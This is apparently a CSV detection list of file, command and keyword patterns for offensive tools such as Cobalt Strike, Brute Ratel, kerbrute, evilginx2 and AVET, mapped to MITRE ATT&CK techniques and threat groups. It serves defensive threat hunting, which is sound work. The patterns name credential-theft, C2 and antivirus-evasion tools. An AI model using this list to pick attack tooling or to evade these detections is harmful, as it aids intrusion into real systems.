"*bruteratel.com/*",".{0,1000}bruteratel\.com\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel/*",".{0,1000}bruteratel\/.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brute-Ratel-C4*",".{0,1000}Brute\-Ratel\-C4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brutesploit.git*",".{0,1000}Brutesploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*BruteSploit/wlist/*",".{0,1000}BruteSploit\/wlist\/.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*brutespray -*",".{0,1000}brutespray\s\-.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray.exe*",".{0,1000}brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray.go*",".{0,1000}brutespray\.go.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray/brute*",".{0,1000}brutespray\/brute.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*brutespray-output*",".{0,1000}brutespray\-output.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*BruteStager.csproj*",".{0,1000}BruteStager\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*BruteStager.sln*",".{0,1000}BruteStager\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*bruteuser.go*",".{0,1000}bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*bruteuserCmd*",".{0,1000}bruteuserCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*BruteX*",".{0,1000}BruteX.{0,1000}","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. 
Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","10","10","1841","563","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" "*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bshspawn*",".{0,1000}bshspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
"*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bucketloot -*",".{0,1000}bucketloot\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot https://*",".{0,1000}bucketloot\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot.exe -*",".{0,1000}bucketloot\.exe\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that 
store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot.exe https://*",".{0,1000}bucketloot\.exe\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-darwin64*",".{0,1000}bucketloot\-darwin64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-freebsd64*",".{0,1000}bucketloot\-freebsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" 
"*BucketLoot-master*",".{0,1000}BucketLoot\-master.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-openbsd64*",".{0,1000}bucketloot\-openbsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-windows32.exe*",".{0,1000}bucketloot\-windows32\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*bucketloot-windows64.exe*",".{0,1000}bucketloot\-windows64\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular 
Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*buffer_overflow.py*",".{0,1000}buffer_overflow\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*-Build $RandomAttackPath*",".{0,1000}\-Build\s\$RandomAttackPath.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*Build Evil Lsass Twin*",".{0,1000}Build\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*build Freeze.go*",".{0,1000}build\sFreeze\.go.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*build GoStompy.go*",".{0,1000}build\sGoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*build SourcePoint.go*",".{0,1000}build\sSourcePoint\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*build Supernova.go*",".{0,1000}build\sSupernova\.go.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*build ZipExec.go*",".{0,1000}build\sZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*build.ps1 -commands * -profile *selfcontained -singlefile*",".{0,1000}build\.ps1\s\-commands\s.{0,1000}\s\-profile\s.{0,1000}selfcontained\s\-singlefile.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*build.ps1 -profiles * -commands * -compressed*",".{0,1000}build\.ps1\s\-profiles\s.{0,1000}\s\-commands\s.{0,1000}\s\-compressed.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*build/breg.cna*",".{0,1000}build\/breg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*build/evilginx*",".{0,1000}build\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*build_40xshikata_revhttpsunstaged_win32.sh*",".{0,1000}build_40xshikata_revhttpsunstaged_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_50xshikata_quiet_revhttps_win32.sh*",".{0,1000}build_50xshikata_quiet_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_50xshikata_revhttps_win32.sh*",".{0,1000}build_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_asciimsf_fromcmd_revhttps_win32.sh*",".{0,1000}build_asciimsf_fromcmd_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_asciimsf_revhttps_win32.sh*",".{0,1000}build_asciimsf_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_avetenc_dynamicfromfile_revhttps_win32.sh*",".{0,1000}build_avetenc_dynamicfromfile_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with 